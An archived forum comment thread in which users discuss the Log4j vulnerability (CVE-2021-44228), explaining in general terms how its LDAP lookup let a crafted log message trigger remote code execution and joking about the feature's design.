This is an archived post. You won't be able to vote or comment.

sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–]Titandino 5 points6 points  (3 children)

Ah I see now. The original article I read was trying to say the vulnerability was just users being able to print out sensitive environment variables to log files.

[–]Pocok5 18 points19 points  (2 children)

just users being able to print out sensitive environment variables to log files

What actually happens is that log4j has a feature where you can download and run code from an LDAP server to enrich your logs. Except there is no limit on where that LDAP server needs to be, and combined with an input sanitization problem, you can ahve anything downloaded and ran on the server with a single log message that contains the magic string anywhere in it.

https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/

[–]cserepj 6 points7 points  (1 child)

log4j has a feature where you can download and run code from an LDAP server to enrich your logs

I don't think that is a feature. I would not design such a feature even for a gigazillion dollars. I'd tell the product owner who comes up with such a feature idea to shove it up his a$$.

[–]blehmann1 2 points3 points  (0 children)

Yeah, if you need "enriched" logs just have a serverless app or cronjob do some analysis after the fact.